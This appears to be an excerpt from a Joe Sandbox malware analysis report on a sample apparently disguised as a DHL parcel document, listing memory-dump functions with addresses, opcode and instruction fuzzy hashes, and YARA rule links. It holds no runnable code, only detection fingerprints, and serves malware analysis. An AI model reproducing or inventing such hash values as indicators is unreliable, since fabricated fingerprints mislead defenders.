
Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a09af330f012ecc276f24b1dcdc9b4a3f56fbe43e37d59aee1741d89a18ea0c
Instruction ID: e03102440ea3df5558661bbaac79ac22af5bf0a0a970d69b01ac06750528c1ae
Opcode Fuzzy Hash: 2a09af330f012ecc276f24b1dcdc9b4a3f56fbe43e37d59aee1741d89a18ea0c
Instruction Fuzzy Hash: 573169B0D002499FDB11DFA9D990BEEBFF5EF48310F248029E909AB290DB745945CF90

Function 06756A58 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba26ec308d658c2cfb85e78502e613f43defbcd8d1ec48925d574dc59fa20088
Instruction ID: 21d41c3ec54fedbe19b7f22b5b9c0d6d4ad080a8b49f428481aefa512170daad
Opcode Fuzzy Hash: ba26ec308d658c2cfb85e78502e613f43defbcd8d1ec48925d574dc59fa20088
Instruction Fuzzy Hash: F8312270E00219CFDB44DFA9D844AEEBBF2BF48310F61D1AAE814A3261E7B45940CF90

Function 065CE760 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c9a4ebfaf48e35d7c4ec350e988545c478d4c17e67bd602dd75669f7b3161b1
Instruction ID: e268e0c6eac0a94efea06ff1a004db3407cfb4f6f5b8b8dd06a398e18a797825
Opcode Fuzzy Hash: 2c9a4ebfaf48e35d7c4ec350e988545c478d4c17e67bd602dd75669f7b3161b1
Instruction Fuzzy Hash: 49314975E052198FDB44CFAAD841AEEBBF6FB89310F10842AE504B7342D7785A44DFA1

Function 065C63B0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba553b24e66ff23ee8c5f768fbcde75f8ec6ed994e8bc4c2fc61d0a457d97c2
Instruction ID: dd859d7d073e65418dfddc24bb7571179bcf3a35b3dbf29152e24f2c3d9e3620
Opcode Fuzzy Hash: fba553b24e66ff23ee8c5f768fbcde75f8ec6ed994e8bc4c2fc61d0a457d97c2
Instruction Fuzzy Hash: 7931A570A046498FCB41EFA4C8908AEBBB5FF8A310B10416FD50597361DB349A46CBA1

Function 027B70FF Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5934ef770c80546953591c82280baabfc3b8e70125b25bf3ffa2dd37a87a67ef
Instruction ID: e8a23bc42e9eff15598b3c5231ff25b414f5c66ce663b0304b959d23b33fbc9e
Opcode Fuzzy Hash: 5934ef770c80546953591c82280baabfc3b8e70125b25bf3ffa2dd37a87a67ef
Instruction Fuzzy Hash: 85316CB0905208DFEB45DFA8C88579EBFF1EFCA301F2081A6D405A7255E7784A44DF62

Function 027BB180 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34862ba862f5515dd24b2460a61b7c04eecb5e96c1998193cb2cbe6f4bb8832
Instruction ID: b3e58a2acb34c4a232566c0154f813656f3beea090dbf1acfc4db42e52bde23d
Opcode Fuzzy Hash: d34862ba862f5515dd24b2460a61b7c04eecb5e96c1998193cb2cbe6f4bb8832
Instruction Fuzzy Hash: 4C3169B4D0420CCFDB05DFA9C8447EEBBB2AF89304F00952ADD15A7281DB780A45CFA1

Function 06756598 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83274fd4a492d9d1f33adfa1b2405b095f662cc155e40f30393b0bc458276438
Instruction ID: 8496c15fbc4f81e2b6f46f2a3fed76deeaac3911f11d954453c3e0f767c72822
Opcode Fuzzy Hash: 83274fd4a492d9d1f33adfa1b2405b095f662cc155e40f30393b0bc458276438
Instruction Fuzzy Hash: B1313CB5E012189FCB05DFA8D8545EEBFB6FF88310F10846AEA15A73A5EB315940CF91

Function 027B6658 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264af3448815592cae64e5e5c3984a4d1c7e5e4759c99f29d33edf969d6a6ed8
Instruction ID: ee1a3721ca696b501ba96b1ecbb0d75b1e4beea61388ec0e6de686fd3d11fdc5
Opcode Fuzzy Hash: 264af3448815592cae64e5e5c3984a4d1c7e5e4759c99f29d33edf969d6a6ed8
Instruction Fuzzy Hash: 4D3135B0D002499FDB15DFA9D994BEEBFF5EF48310F248029E909AB254DB749941CFA0

Function 065CE770 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6bcf390186318db2590d9afa1d4e14e1d5130e40bb14b7798cfc927d8c4142d
Instruction ID: 39230489afc0db8a5b0f2436756e1dfdb5614db0e8b6c7a93640d08feab196de
Opcode Fuzzy Hash: a6bcf390186318db2590d9afa1d4e14e1d5130e40bb14b7798cfc927d8c4142d
Instruction Fuzzy Hash: 52313474E042198FEB44CF9AD841AEEBBFAFB89310F10942AE508A3341D7785A049F90

Function 065E5608 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ec064dfe04b4dc5409877d33682a7d7c354799caf2a4641ce0a1b757c1c3c4
Instruction ID: 19206576a4dffab5710432b1e4333df87e531507d43ab9de435423cb7efa7682
Opcode Fuzzy Hash: 30ec064dfe04b4dc5409877d33682a7d7c354799caf2a4641ce0a1b757c1c3c4
Instruction Fuzzy Hash: C5213774D052189FDF09DFAAD8046EEBBF6FB89314F14846AE109B3250E7750A44CFA1

Function 069E519D Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1903e9d3f790206dd3c2ae9a5b75df7ec8bfd8d1be4d04f1450f756ab05f69a
Instruction ID: 631cd432e9ac1b239c7c54dd6173bf0ecbfbe37a38e2b3482bdd18b05f861f4c
Opcode Fuzzy Hash: f1903e9d3f790206dd3c2ae9a5b75df7ec8bfd8d1be4d04f1450f756ab05f69a
Instruction Fuzzy Hash: 68311270E05208CFEB45CFA9D0447ACBBF2BB89308F21C029E415AB659D77A9944CF40

Function 065EDFD2 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56cd1ad014c620d4f5773a1f35c09d3db25f3376b38467fca573f8c1a67c3271
Instruction ID: 1fa65d744863b323a01d5b9f5bbed6d7063cb7d600cf75bb643e67ba384b0ac6
Opcode Fuzzy Hash: 56cd1ad014c620d4f5773a1f35c09d3db25f3376b38467fca573f8c1a67c3271
Instruction Fuzzy Hash: 31314B70D14229CFEFA8CFA9C885BADBBF2BF49304F208469D019A7242DB744984CF40

Function 06757D08 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efed41e8ae13c1c4a2bb00a696cd9a1ee4b481f199782be68a536cb81605b51f
Instruction ID: 0a3fc70e189788fb999b5134c7a2100a1600f0f730adcc562fb78e9787ab20b3
Opcode Fuzzy Hash: efed41e8ae13c1c4a2bb00a696cd9a1ee4b481f199782be68a536cb81605b51f
Instruction Fuzzy Hash: 7D31E8B4D05309DFDB88DFA8D8846ADBBF5AB49300F25C4EAD818D7251D7B94A85CB80

Function 065C63E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3e8cfa46e25825a42d94472626cf399c25498db23bd49ec5936484bc03821d
Instruction ID: dcbcb8d55805ff794d1e28c99396d24c8139adcdbae620ea2d5a285c60a1954e
Opcode Fuzzy Hash: 8a3e8cfa46e25825a42d94472626cf399c25498db23bd49ec5936484bc03821d
Instruction Fuzzy Hash: 8C214974B1060ACFCB44EFA8C5948AEB7B5FFC9710B10462AD51597360DF709A06CB91

Function 0675AB28 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b23812426fbf383e6d69c964c1e916ab62ff5fc91abc1f2fbb122ae2bdfdfff
Instruction ID: a44fef9c1194a2fa5d9f7dc1243371c5dbfbf9f8db2e414aaa7e68d7cf2b231d
Opcode Fuzzy Hash: 1b23812426fbf383e6d69c964c1e916ab62ff5fc91abc1f2fbb122ae2bdfdfff
Instruction Fuzzy Hash: 84218175A00119DFDB159F68C4549EE7BB7EF8C320F148669E911A7390CB709C85CBA0

Function 027B7110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec64e9289198aaccf7e555655973065a782949289bdd5291688c4ade8a3b9af
Instruction ID: aff9856f268d8cde281d25b15bb9dfc86d8e5721c48e32f64000016dd3a639bb
Opcode Fuzzy Hash: 4ec64e9289198aaccf7e555655973065a782949289bdd5291688c4ade8a3b9af
Instruction Fuzzy Hash: EE3104B090120CDFEB49EFA8D4857AEBBB1AFC9301F209165D505A3254E7784A84EF62

Function 0675E7F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ce5ceebea5a38e41d007a0fa9978a7edf3be7f9136b171d7c897fff2b797a6
Instruction ID: 94a3e256bd55b755323cc20b9c2445688bb094790fcad89a4a1f94ceecd982fc
Opcode Fuzzy Hash: a1ce5ceebea5a38e41d007a0fa9978a7edf3be7f9136b171d7c897fff2b797a6
Instruction Fuzzy Hash: 6E217571E00219DFEB90DBB8C904BBEBBB5AF44350F1190A6D805DB290E774EB40CB92

Function 00FAD6C8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096535518.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c025b31c5494bf37b0eb061a53640d2bacd122310038f187776b47f6d6ce23
Instruction ID: ae291e21f469a85474812ede6e765f9523a6b3a50f62bfd2379e6f518c6a6998
Opcode Fuzzy Hash: f6c025b31c5494bf37b0eb061a53640d2bacd122310038f187776b47f6d6ce23
Instruction Fuzzy Hash: B12145B6504204DFCB09DF14C9C0F26BF65FB99324F20C568E80A0B656C336D806EBA2

Function 00FBD030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096598143.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce82c212dfbc8fdaa8d8ca30027ddbaf9b7cfc68968e69386b55dedb74874560
Instruction ID: cde6a32b61fd01246b92bb9ec7d72b56502c76bd9940b62c57cf9c1be99a28d8
Opcode Fuzzy Hash: ce82c212dfbc8fdaa8d8ca30027ddbaf9b7cfc68968e69386b55dedb74874560
Instruction Fuzzy Hash: 49213776504204DFDB11EF18D9C4B66BF65FB84324F24C569D9090B24AD336D806EFA3

Function 00FBD005 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096598143.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470881352892e2a44bc0b95ab47e68098541b6c4a2e2123e277ff03d1b764574
Instruction ID: 29f0697a353939f8a73c0c46ffd39d33cc6f10fa613533a991689e3ac9ffc59e
Opcode Fuzzy Hash: 470881352892e2a44bc0b95ab47e68098541b6c4a2e2123e277ff03d1b764574
Instruction Fuzzy Hash: 04216D715093C08FCB039F24D990752BF71EB46220F1981DBD8448B2A7C33A981ADB62

Function 065C575A Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962d9e72ca52b297bf182339d8fbc223e597b401459ae38b87483182d6e3665c
Instruction ID: 5d6ec22b3d2387b075c979fad9f452188783876775b52975987be5cf55435bd5
Opcode Fuzzy Hash: 962d9e72ca52b297bf182339d8fbc223e597b401459ae38b87483182d6e3665c
Instruction Fuzzy Hash: 88212235A007089FC7659BB4D804AAA7BA2FBC9330F04816DE5518B291DB75BC92CB90

Function 069E57F8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2916aeef5714245619b8ee360728b73b0ae4b0dafb5ca4621ce0058f5f1665e
Instruction ID: ff09db42abc64f503bc2129f208919caa29f6f318c344330565774d4e62996c6
Opcode Fuzzy Hash: d2916aeef5714245619b8ee360728b73b0ae4b0dafb5ca4621ce0058f5f1665e
Instruction Fuzzy Hash: 3F21ACB0E04209CFDB80DFA9D8446AEBBF6FF8D304F118469E405A7291DB784A04DF91

Function 065C3662 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8158c27339a4db3a6b4c4d1eb1403494227b4e3df108728367c2cdb9ca43e8c6
Instruction ID: 6f07769ab9489a76ed2915c8e1fc18d4ed3586bef82215e23dc7f356921fc2d9
Opcode Fuzzy Hash: 8158c27339a4db3a6b4c4d1eb1403494227b4e3df108728367c2cdb9ca43e8c6
Instruction Fuzzy Hash: BF11B1353097549FC3069F24D8149AABBA6EFCA71071080AAE905CB392CF36DD46C7E1

Function 069E5808 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 116c063824ca5dd77c7c032be02356cd5c9f695334c5a58944bb3ed689d2b53f
Instruction ID: 72f9c72c7b39f3e8076ee190f69e7ad51a522ae2f4f6901d3f6773954c6341c0
Opcode Fuzzy Hash: 116c063824ca5dd77c7c032be02356cd5c9f695334c5a58944bb3ed689d2b53f
Instruction Fuzzy Hash: 432157B0E04209DFDB40DFA9D8406EEBBB6FB8D304F118429E505A7285DB795A09DF91

Function 065E5618 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4089c9adbc36119ca68f8803a3442b12c458f69fd76e3993668aada8b1aa6d5a
Instruction ID: 72b7b27f3580065380d402f8af1c41a04b5bc3f33c29d16870b4ec54bf16a381
Opcode Fuzzy Hash: 4089c9adbc36119ca68f8803a3442b12c458f69fd76e3993668aada8b1aa6d5a
Instruction Fuzzy Hash: CA2123B4D05219CFDF48DFAAD8482EEBBF6FB88305F14842AD109B2250E7750A44CFA1

Function 0675A4B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef684ab1ae6fa7a0f92d956937c90440cf984f21579d13aec044cf6da95a7e2c
Instruction ID: fd4c47b5f9fa76d72185c0ff4fb58bc4f4e6993d6e6a16f4a4d30d2caa927443
Opcode Fuzzy Hash: ef684ab1ae6fa7a0f92d956937c90440cf984f21579d13aec044cf6da95a7e2c
Instruction Fuzzy Hash: D721A1706006119FCB54EF68D8457AEBBF6EF88304F40C928E10EDB686EFB599458BD0

Function 065EED50 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72857720d2d2203731deec082469c847dae6f56ac69d31e65966b4912672abfb
Instruction ID: 61ff69cc1bfc37ae818de42498e7907b8c3e992bc53ed37b820a1b935332ac0b
Opcode Fuzzy Hash: 72857720d2d2203731deec082469c847dae6f56ac69d31e65966b4912672abfb
Instruction Fuzzy Hash: 7E216978E1421ADFCF88DFA9C5856AEBBB2BB88300F10C1A9C455A7254D7349A81CF91

Function 06A577BC Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3cdcc5bec05499891d078ff88d3a9887c4c6d11976ea1c1b052c98252a85c9d
Instruction ID: a50965eef42eb3eac64792f666d0d43ee6b2803a3d94d49b76f25e7500f75d15
Opcode Fuzzy Hash: c3cdcc5bec05499891d078ff88d3a9887c4c6d11976ea1c1b052c98252a85c9d
Instruction Fuzzy Hash: 4F318674901228CFDBA4DF68C888A99BBB1BF49304F1584D7E80CA7351D734AE85DF62

Function 065EED40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b83fb38bf59bb1c224a05d25cc028bc973095f5b58f9adf9ef71fd15a25705
Instruction ID: d0917d8d281ad2cfff5419cfc1ee8738366979886e574f84ab1b75afc70dc0f9
Opcode Fuzzy Hash: 99b83fb38bf59bb1c224a05d25cc028bc973095f5b58f9adf9ef71fd15a25705
Instruction Fuzzy Hash: D3215974D19209DFCB98CFB899826AEBFF5FB89310F2486AAD409D3251D2344A40DF81

Function 065C4F30 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d0075139c23e515dfae17d771a884aab435f72e508f198f3495c02b975a422
Instruction ID: 7196a7f78fc130fbd4521ee0c36357c3cf193acb11c565e2ff63e2612bb08d0f
Opcode Fuzzy Hash: 82d0075139c23e515dfae17d771a884aab435f72e508f198f3495c02b975a422
Instruction Fuzzy Hash: 4A21AC30B002058FCB54EFA8D894A6EBBF2FF89210B14456DE5469B3A1CB70ED05CBA1

Function 069EA76F Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37e04b02138548b1d0a56c2e93fd5481ab534ae59da228455de33211f54efbf
Instruction ID: f6f84bc5822460fe1964ea7b5496c28872cb6c1d183effd647cbc3af57fd031d
Opcode Fuzzy Hash: f37e04b02138548b1d0a56c2e93fd5481ab534ae59da228455de33211f54efbf
Instruction Fuzzy Hash: 56214CB0D05208DFCB85DFA8E8806ADBBF1AF48300F2484A6D418A7665D77A4E85CF80

Function 065C0006 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d88799b41992785abde85a32a8dab129bd7d5cbff4b8bfaa16d634ec124b3f6
Instruction ID: 685327efbcedf97f2aa239a58ec11755b758c1bfeb0f576433e4807ed7d1261d
Opcode Fuzzy Hash: 9d88799b41992785abde85a32a8dab129bd7d5cbff4b8bfaa16d634ec124b3f6
Instruction Fuzzy Hash: 3B112B31615385AFC7134B64DC159AABFB9EF83270B09409BE845CB263C6355C19C7A1

Function 027BC4B8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47989e780af73a9b9492bbb74321c2fdbcc7f8b8bf39f45d049bef286fc5e2a8
Instruction ID: 3b6f4ee409e47675d6a78dc7b1c1ed684aeb096e4dc015e52fb769973dd2ab03
Opcode Fuzzy Hash: 47989e780af73a9b9492bbb74321c2fdbcc7f8b8bf39f45d049bef286fc5e2a8
Instruction Fuzzy Hash: 7B213874D0421A9FDB06CFA9D844AEEBFF9BF89310F24806AE604B2250D7745A45CBA1

Function 027BB109 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599409e46757395557ea01281d7a48a095e53b34ce67e31b93aa931997870091
Instruction ID: a826e61daed88c2a18093259a0324ede402551bcc936a1f97ba8ff466d165db7
Opcode Fuzzy Hash: 599409e46757395557ea01281d7a48a095e53b34ce67e31b93aa931997870091
Instruction Fuzzy Hash: F711A37180524C9FD7129FB4E889BED7F74EF4224EF0402E9EC4997262D2758A54CB91

Function 027B1378 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bf6b1ea8a2ae579a7b8ebb3eb60abc6d68240381aad169aa87af62213ad465
Instruction ID: 56f22a8a45f16e02c96e26a616fcaecb08161f9de13f0e41c830bebaf3e6f52a
Opcode Fuzzy Hash: 08bf6b1ea8a2ae579a7b8ebb3eb60abc6d68240381aad169aa87af62213ad465
Instruction Fuzzy Hash: 3421A874A042099FCB41EF78D8959AEBBB2EF89300B1084A9D805EB356DB349D05CF91

Function 0675B8E6 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e654b79b1ae868aa8a7f3e70f0b743218b0e447a94caf8c95f478b2810ec2a6a
Instruction ID: 93a5b37155f6ad5d73db68530a32df7d03a9ee35231f93d02da163d2343f988b
Opcode Fuzzy Hash: e654b79b1ae868aa8a7f3e70f0b743218b0e447a94caf8c95f478b2810ec2a6a
Instruction Fuzzy Hash: E311B635B002159FCF909F6488247BE7BF6EB88651F10446AE945DB380EBB0C901CBA0

Function 069E7F9A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5776100384951e72966349734606de182464a4c9daa58974935dca71dea3bb
Instruction ID: d883bdbaeebc72312d00c01c560043a744631925d995e527effe17498ba3d7cb
Opcode Fuzzy Hash: bd5776100384951e72966349734606de182464a4c9daa58974935dca71dea3bb
